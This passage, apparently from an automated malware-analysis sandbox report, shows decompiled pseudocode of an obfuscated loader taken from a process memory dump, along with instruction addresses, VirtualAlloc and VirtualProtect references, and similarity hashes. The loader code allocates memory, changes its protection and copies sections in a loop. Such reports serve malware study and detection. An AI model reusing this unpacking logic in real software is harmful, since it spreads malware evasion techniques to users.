					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E03334E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E03332FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x03335f16
0x03335f16
0x03335f16
0x03335f17
0x03335f1b
0x03335f1e
0x03335f20
0x03335f23
0x03335f24
0x03335f28
0x03335f2b
0x03335f2c
0x03335f30
0x03335f39
0x03335f3a
0x03335f3d
0x03335f46
0x03335f4a
0x03335f4d
0x03335f56
0x03335f57
0x03335f5a
0x03335f5d
0x03335f63
0x03335f66
0x03335f6e
0x03335f71
0x03335f72
0x03335f75
0x03335f78
0x03335f7b
0x03335f84
0x03335f85
0x03335f88
0x03335f8b
0x03335f91
0x03335f94
0x03335f9d
0x03335f9e
0x03335fa2
0x03335fa5
0x03335fab
0x03335fb1
0x03335fb5
0x03335fb8
0x03335fbb
0x03335fbe
0x03335fc0
0x03335fcb
0x03335fd2
0x03335fda
0x03335fdd
0x03335fe6
0x03335fe7
0x03335fea
0x03335ff3
0x03335ff4
0x03335ff7
0x03335ffa
0x03335ffa
0x03336002
0x03336005
0x03336009
0x0333600d
0x03336017
0x0333601b
0x03336025
0x03336029
0x0333602c
0x03336032
0x03336039
0x0333604b
0x03336054
0x0333605e
0x03336067
0x03336068
0x0333606b
0x0333606e
0x03336074
0x0333607b
0x0333607e
0x03336088
0x0333608b
0x03336094
0x03336095
0x03336098
0x0333609b
0x033360a1
0x033360a7
0x033360ae
0x033360b7
0x033360be
0x033360c1
0x033360c8
0x033360cb
0x033360d4
0x033360db
0x033360de
0x033360e4
0x033360e7
0x033360ee
0x033360f1
0x033360f4
0x033360f7
0x033360f8
0x03336106
0x03336108
0x0333610b
0x03336114
0x03336118
0x03336124
0x03336127
0x0333612d
0x03336133
0x0333613a
0x03336140
0x03336147
0x0333614a
0x0333614f
0x03336156
0x0333615c
0x0333615f
0x03336162
0x0333616b
0x0333616e
0x03336172
0x03336176
0x0333617a
0x0333617e
0x03336188
0x0333618c
0x03336195
0x0333619c
0x0333619f
0x033361ab
0x033361b2
0x033361be
0x033361c1
0x033361c8
0x033361d1
0x033361db
0x033361de
0x033361e5
0x033361e8
0x033361f1
0x033361fb
0x033361fe
0x03336206
0x03336209
0x03336210
0x03336213
0x03336216
0x03336219
0x0333621a
0x0333621b
0x03336231
0x03336239
0x03336240
0x03336249
0x03336253
0x03336256
0x03336256
0x0333625e
0x03336265
0x0333626b
0x0333626c
0x03336276
0x03336279
0x03336283
0x0333628c
0x03336296
0x03336299
0x0333629f
0x033362a9
0x033362b5
0x033362b8
0x033362c3
0x033362c6
0x033362cd
0x033362ce
0x033362d1
0x033362d2
0x033362dd
0x033362df
0x033362e4
0x033362ec
0x033362f6
0x03336300
0x03336303
0x03336306
0x0333630c
0x03336314
0x0333631b
0x03336321
0x03336321
0x0333632a
0x0333632d
0x03336335
0x03336338
0x0333633b
0x0333633e
0x0333633f
0x03336343
0x0333634d
0x03336351
0x0333635d
0x03336360
0x03336368
0x0333636f
0x03336375
0x0333637c
0x0333637f
0x03336385
0x03336389
0x0333638c
0x03336396
0x03336399
0x033363a2
0x033363a9
0x033363ac
0x033363b4
0x033363bb
0x033363c1
0x033363c7
0x033363ca
0x033363d1
0x033363d3
0x033363dc
0x033363e6
0x033363e9
0x033363f0
0x033363f3
0x033363fd
0x03336400
0x03336403
0x03336412
0x03336417
0x0333641b
0x0333641e
0x03336420
0x03336421
0x0333642c
0x0333642e
0x03336433
0x0333643c
0x0333643f
0x03336448
0x03336452
0x03336455
0x03336455
0x03336461
0x03336468
0x0333646e
0x03336474
0x03336477
0x03336483
0x03336486
0x0333648c
0x03336494
0x0333649b
0x033364a1
0x033364a6
0x033364b2
0x033364b6
0x033364b9
0x033364c1
0x033364c5
0x033364c8
0x033364d4
0x033364db
0x033364e1
0x033364e3
0x033364e6
0x033364f2
0x033364f5
0x033364fe
0x0333650a
0x0333650d
0x03336515
0x03336518
0x0333651f
0x03336522
0x03336525
0x03336528
0x03336529
0x03336537
0x03336539
0x0333653c
0x0333653e
0x03336544
0x0333654e
0x03336551
0x03336558
0x0333655c
0x0333655f
0x0333655f
0x03336567
0x0333656e
0x03336574
0x03336575
0x03336586
0x03336590
0x03336593
0x0333659a
0x0333659e
0x033365a1
0x033365a9
0x033365b0
0x033365b6
0x033365b7
0x033365ca
0x033365cc
0x033365ce
0x033365d2
0x033365d5
0x033365db
0x033365e5
0x033365e8
0x033365ee
0x033365f6
0x033365fd
0x03336603
0x0333660b
0x03336610
0x03336618
0x0333661b
0x03336622
0x03336625
0x0333662b
0x03336632
0x03336635
0x0333663c
0x03336640
0x03336643
0x0333664a
0x0333664e
0x03336651
0x03336659
0x0333665f
0x03336666
0x03336667
0x0333666a
0x0333666b
0x03336671
0x03336674
0x03336677
0x0333667a
0x03336685
0x0333668f
0x03336693
0x03336696
0x0333669d
0x033366a0
0x033366a3
0x033366a3
0x033366a9
0x033366ac
0x033366af
0x033366c2
0x033366c6
0x033366c9
0x033366d2
0x033366dc
0x033366e8
0x033366eb
0x033366f1
0x033366f8
0x033366fe
0x03336703
0x03336706
0x0333670b
0x0333670e
0x03336713
0x0333671a
0x0333671d
0x03336720
0x03336727
0x03336730
0x0333673a
0x0333673d
0x03336743
0x0333674d
0x03336757
0x0333675b
0x0333675e
0x0333676d
0x03336774
0x03336777
0x0333677a
0x0333677d
0x0333677e
0x0333677f
0x03336781
0x0333678c
0x03336791
0x0333679a
0x0333679d
0x033367a7
0x033367ab
0x033367ae
0x033367b4
0x033367b6
0x033367bd
0x033367c3
0x033367c4
0x033367c7
0x033367cc
0x033367cf
0x033367d2
0x033367d2
0x033367d3
0x033367dd
0x033367e0
0x033367e7
0x033367f1
0x033367f4
0x033367f7
0x033367fe
0x03336801
0x0333680b
0x0333680f
0x03336812
0x0333681d
0x03336824
0x03336827
0x0333682a
0x0333682d
0x0333682e
0x0333682f
0x03336841
0x0333684c
0x03336858
0x0333685b
0x03336861
0x03336868
0x0333686e
0x03336873
0x03336876
0x0333687e
0x03336881
0x03336881
0x03336889
0x0333688d
0x03336897
0x0333689b
0x033368a4
0x033368ae
0x033368b1
0x033368bd
0x033368c4
0x033368cd
0x033368d0
0x033368d3
0x033368e0
0x033368e4
0x033368e7
0x033368f0
0x033368f7
0x03336900
0x03336901
0x03336904
0x03336907
0x03336913
0x03336916
0x03336919
0x03336926
0x0333692f
0x03336939
0x0333693c
0x03336945
0x03336951
0x03336954
0x03336960
0x03336968
0x0333696c
0x03336971
0x03336972
0x0333697d
0x0333697f
0x03336984
0x03336986
0x0333698d
0x03336990
0x03336993
0x0333699a
0x0333699d
0x033369a0
0x033369a6
0x033369ae
0x033369b5
0x033369bb
0x033369c0
0x033369c3
0x033369c6
0x033369cd
0x033369d0
0x033369d6
0x033369d9
0x033369e0
0x033369e4
0x033369e7
0x033369f0
0x033369f3
0x033369fb
0x03336a02
0x03336a08
0x03336a0b
0x03336a0e
0x03336a13
0x03336a1a
0x03336a1e
0x03336a24
0x03336a27
0x03336a30
0x03336a33
0x03336a3f
0x03336a46
0x03336a4f
0x03336a52
0x03336a56
0x03336a5d
0x03336a64
0x03336a67
0x03336a6e
0x03336a72
0x03336a75
0x03336a7c
0x03336a80
0x03336a83
0x03336a8a
0x03336a8d
0x03336a90
0x03336a9f
0x03336aa6
0x03336aa9
0x03336aac
0x03336aaf
0x03336ab0
0x03336ab3
0x03336abe
0x03336ac0
0x03336ac3
0x03336ac5
0x03336acc
0x03336acf
0x03336ad2
0x03336ad9
0x03336adc
0x03336adf
0x03336ae5
0x03336aec
0x03336af2
0x03336af2
0x03336af5
0x03336af8
0x03336afc
0x03336aff
0x03336b02
0x03336b09
0x03336b0c
0x03336b0f
0x03336b17
0x03336b1e
0x03336b24
0x03336b25
0x03336b2c
0x03336b2f
0x03336b35
0x03336b3f
0x03336b42
0x03336b49
0x03336b4c
0x03336b4f
0x03336b55
0x03336b5c
0x03336b62
0x03336b65
0x03336b6b
0x03336b71
0x03336b7b
0x03336b7e
0x03336b85
0x03336b88
0x03336b8b
0x03336b91
0x03336b99
0x03336ba0
0x03336ba6
0x03336ba6
0x03336baf
0x03336bbb
0x03336bc5
0x03336bcf
0x03336bd2
0x03336bd5
0x03336bdb
0x03336be2
0x03336be8
0x03336bf4
0x03336bf6
0x03336bfd
0x03336c07
0x03336c10
0x03336c17
0x03336c20
0x03336c21
0x03336c24
0x03336c27
0x03336c2d
0x03336c30
0x03336c3a
0x03336c3d
0x03336c40
0x03336c46
0x03336c4d
0x03336c59
0x03336c5c
0x03336c6b
0x03336c72
0x03336c75
0x03336c78
0x03336c7b
0x03336c7c
0x03336c7d
0x03336c88
0x03336c8a
0x03336c8f
0x03336c98
0x03336c9b
0x03336ca5
0x03336ca9
0x03336cac
0x03336cac
0x03336cb4
0x03336cbb
0x03336cc2
0x03336ccc
0x03336cd5
0x03336cdc
0x03336cdf
0x03336ce8
0x03336cf1
0x03336cf8
0x03336cfb
0x03336d06
0x03336d09
0x03336d10
0x03336d11
0x03336d14
0x03336d15
0x03336d1b
0x03336d1e
0x03336d21
0x03336d24
0x03336d2d
0x03336d30
0x03336d39
0x03336d40
0x03336d43
0x03336d43
0x03336d49
0x03336d51
0x03336d58
0x03336d63
0x03336d6b
0x03336d6d
0x03336d6f
0x03336d73
0x03336d7c
0x03336d86
0x03336d90
0x03336d93
0x03336d96
0x03336d9c
0x03336da4
0x03336dab
0x03336db1
0x03336dba
0x03336dc4
0x03336dc5
0x03336dc8
0x03336dcb
0x03336dce
0x03336dcf
0x03336dd0
0x03336dda
0x03336de4
0x03336de8
0x03336df1
0x03336dfb
0x03336dfe
0x03336e06
0x03336e0d
0x03336e13
0x03336e16
0x03336e19
0x03336e1c
0x03336e20
0x03336e24
0x03336e2e
0x03336e31
0x03336e34
0x03336e3b
0x03336e3e
0x03336e48
0x03336e4b
0x03336e4e
0x03336e5a
0x03336e62
0x03336e66
0x03336e6b
0x03336e6c
0x03336e72
0x03336e75
0x03336e78
0x03336e7b
0x03336e7d
0x03336e84
0x03336e87
0x03336e8a
0x03336e91
0x03336e94
0x03336e97
0x03336e9d
0x03336ea4
0x03336eaa
0x03336eaa
0x03336eb9
0x03336ec8
0x03336ec9
0x03336ec9
0x03336ec9
0x03336ed4
0x03336ed7
0x03336ee0
0x03336ee2
0x03336ee3
0x03336ee3
0x03336ee3
0x03336eec
0x03336eef
0x03336ef2
0x03336f07
0x03336f0a
0x03336f0d
0x03336f10
0x03336f11
0x03336f14
0x03336f1b
0x03336f21
0x03336f22
0x03336f31
0x03336f33
0x03336f39
0x03336f3c
0x03336f40
0x03336f43
0x03336f4b
0x03336f4e
0x03336f4e
0x03336f61
0x03336f68

APIs

VirtualProtect.KERNELBASE ref: 03336B65

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: d3a31524853703f297531732e464e4c98d9892c66aedd210896f08d469e46c93
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: 86C21472844608EFEB049FA0C8C57EEBBF5FF48320F0989ADD895AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0333709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0333709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E03332D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E0333746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E03332A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E03335F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E03338F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x0333709d
0x0333709d
0x0333709d
0x0333709d
0x0333709e
0x033370a5
0x033370ab
0x033370ae
0x033370af
0x033370b2
0x033370b6
0x033370ba
0x033370c1
0x033370cb
0x033370d0
0x033370d0
0x033370d6
0x033370dd
0x033370e0
0x033370e3
0x033370e9
0x033370f5
0x033370fc
0x03337102
0x0333710a
0x0333710c
0x03337112
0x03337119
0x0333711d
0x0333712b
0x0333712b
0x03337135
0x03337138
0x03337138
0x0333713e
0x03337146
0x0333714a
0x0333714b
0x03337153
0x03337157
0x03337158
0x0333715d
0x03337163
0x03337166
0x03337169
0x0333716c
0x03337179
0x0333717d
0x0333717f
0x03337181
0x03337182
0x03337184
0x0333718e
0x03337191
0x03337191
0x0333719d
0x0333719e
0x0333719e
0x0333719e
0x033371a6
0x033371a8
0x033371b0
0x033371b4
0x033371b5
0x033371ba
0x033371c2
0x033371c6
0x033371c7
0x033371c7
0x033371cc
0x033371e0
0x033371ea
0x033371f0
0x033371f1
0x033371f7
0x033371fb
0x033371ff
0x03337201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 033370D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 03337138

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 999d55cd0503fdb4f5bdd9a62ef5deaa9ed1677b972842a5477c45e9ccfe87d1
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 37415B72904204EFEB04DF64CCC5BAEBBF5EF88710F09849DEC88AB245C77429509B69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03331B1E, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03331B1E(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t58;
				signed int _t60;
				void* _t77;
				void* _t89;
				void* _t90;
				signed int _t91;
				void* _t95;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t105;
				signed int _t106;

				_t89 = __ebx;
				_t58 = E03332467(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41c395)),  *((intOrPtr*)(__ebx + 0x41c290)),  *((intOrPtr*)(__ebx + 0x41c3b1)));
				if(_t58 < 0xda63) {
					_t58 = (_t58 & 0x00000000) - 0xffffffff;
				} else {
					_a8 = _a8 & 0xffffffff;
					_t105 = _t105 ^  *(__ebx + 0x41c8a6);
				}
				_t106 = _t105 | _t101;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v12 = _v12 - 1;
				_t60 = _t58 & 0x00000000;
				_t96 = _t95 - _t60;
				if(_a4 < 0x7e4d) {
					_v16 = 0x581;
					 *(_t89 + 0x41c8a6) = 0xffffffff;
					_t97 = 1;
				} else {
					_t97 = _t96 ^ 0x00000034;
					_a4 = _a4 ^ 0xffffffff;
				}
				_t91 = _t90 - 0xffffffff;
				if(_t60 - 1 >= 0x60f9) {
					 *(_t89 + 0x41c8a6) = 1;
					_v16 = _v16 + 0xfffffe47;
				} else {
					_t106 =  *(_t89 + 0x41c8a6);
				}
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + _t101;
				_v8 = _v8 | _t101;
				_v8 = _v8 - 1;
				_v12 = _v12 ^ 0x00000000;
				 *(_t89 + 0x41c8a6) = 0xfffff898;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v16 = 1;
				_a4 = (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + (_t91 ^ _t97 & 0x00000000) + 1 + _v12;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_v8 = 1;
				_t77 = E03339159(_v16, _t89, (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1);
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_a4 = _a4 + (_t77 + 0x00000001 - 0x00000001 ^ 0x310) + 0xffffffff;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) | 0x00000316;
				return 0xfffffffffffff815;
			}

0x03331b1e
0x03331b3b
0x03331b45
0x03331b58
0x03331b47
0x03331b47
0x03331b4b
0x03331b4b
0x03331b64
0x03331b66
0x03331b6c
0x03331b70
0x03331b75
0x03331b7e
0x03331b89
0x03331b90
0x03331b9a
0x03331b80
0x03331b80
0x03331b83
0x03331b83
0x03331b9f
0x03331ba8
0x03331bb7
0x03331bc1
0x03331baa
0x03331baa
0x03331bb0
0x03331be4
0x03331bfe
0x03331c01
0x03331c0c
0x03331c1c
0x03331c29
0x03331c3c
0x03331c44
0x03331c47
0x03331c4d
0x03331c56
0x03331c5e
0x03331c74
0x03331c91
0x03331cb3
0x03331ccd

Strings

M~, xrefs: 03331B77

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID: M~
API String ID: 0-3014885260
Opcode ID: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction ID: 58eb831cefedd3281e8f575efb44dcacd44b153f8a18fac400aae08f3ac99e39
Opcode Fuzzy Hash: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction Fuzzy Hash: F341C173C10A059FEB00DE7CCDC978A7A64EF81339F1883669C399A1D9D33886558B58

Uniqueness

Uniqueness Score: -1.00%

Function 03333A14, Relevance: .9, Instructions: 925
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E03333A14(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t498;
				signed int _t503;
				void* _t505;
				void* _t506;
				signed int _t510;
